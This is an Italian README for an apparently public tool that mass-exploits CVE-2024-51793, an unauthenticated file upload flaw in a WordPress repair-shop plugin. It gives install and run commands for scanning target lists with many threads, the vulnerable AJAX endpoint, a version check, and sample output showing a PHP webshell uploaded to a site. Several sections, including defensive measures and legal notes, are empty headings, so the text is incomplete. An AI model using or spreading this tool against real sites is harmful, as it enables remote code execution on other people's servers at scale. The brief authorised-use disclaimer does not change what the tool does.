
Sfrutta la CVE-2024-51793, un upload arbitrario di file non autenticato nel plugin WordPress Computer Repair Shop, esegue la scansione di elenchi di target, carica webshell PHP e segnala i siti vulnerabili.
📋 Panoramica CVE-2024-51793 è una vulnerabilità di upload arbitrario di file non autenticato nel plugin Computer Repair Shop per WordPress (versioni precedenti alla 3.8116). Questa vulnerabilità consente agli aggressori di caricare file arbitrari, inclusi webshell PHP, senza autenticazione, portando all'esecuzione di codice remoto su siti WordPress vulnerabili.
🚨 Dettagli della vulnerabilità CVE ID: CVE-2024-51793
Tipo di vulnerabilità: Upload arbitrario di file non autenticato
Plugin interessato: Computer Repair Shop WordPress Plugin
Versioni interessate: < 3.8116
Livello di rischio: Critico (Punteggio CVSS: 9.8)
🔧 Dettagli tecnici La vulnerabilità risiede nel gestore dell'azione wc_upload_file_ajax nel plugin, che non riesce a convalidare correttamente i tipi di file e l'autenticazione dell'utente, permettendo ad aggressori non autenticati di caricare file dannosi direttamente sul server.
📦 Installazione e requisiti Prerequisiti Python 3.6+
Pacchetti richiesti: requests
Installazione bash
git clone cd cve-2024-51793-exploit
pip install requests
pip install -r requirements.txt 🛠️ Guida all'uso Utilizzo base bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50 Utilizzo avanzato bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose Argomenti della riga di comando
| Argument | Short | Description | Default |
|---|---|---|---|
| --list | -l | Percorso del file contenente gli URL target (obbligatorio) | - |
| --threads | -t | Numero di thread concorrenti | 50 |
| --output | -o | Directory di output per i risultati | results |
| Formato del file di input | |||
| Crea un file di testo (targets.txt) con un URL per riga: |
text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog 🔍 Come funziona
text /wp-content/plugins/computer-repair-shop/readme.txt 2. Rilevamento della versione Verifica che il plugin contenga "CRM WordPress Plugin" e che la versione sia inferiore alla 3.8116.
text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax 4. Payload del webshell Il webshell caricato fornisce:
📊 File di output Lo strumento genera due file di output principali:
🎯 Esecuzione di esempio bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30
╔══════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2024-51793 Strumento di exploit ║
║ RCE non autenticato nel plugin Computer Repair Shop WP ║
║ ║
╚══════════════════════════════════════════════════════════════╝
[ INFO ] Caricati 150 target unici [ INFO ] Avvio scansione con 30 thread
[ SCANSIONE ] Verifica: http://example.com/ [ VULNERABILE ] Target identificato: http://example.com/ [ SUCCESSO ] Shell caricato: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
[ SCANSIONE ] Verifica: http://testsite.com/ [ NON VULNERABILE ] Target: http://testsite.com/
[ COMPLETATO ] Scansione terminata con successo 🛡️ Misure difensive Per i proprietari del sito Azioni immediate:
Misure preventive:
Per i ricercatori di sicurezza
⚠️ Considerazioni legali ed etiche
🔄 Manutenzione Aggiornamenti Controlla regolarmente per:
Risoluzione dei problemi Problemi comuni e soluzioni:
📞 Supporto Per problemi e miglioramenti:
📚 Riferimenti
Dichiarazione di non responsabilità: Questo strumento deve essere utilizzato solo per ricerche di sicurezza legittime e penetration test autorizzati. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.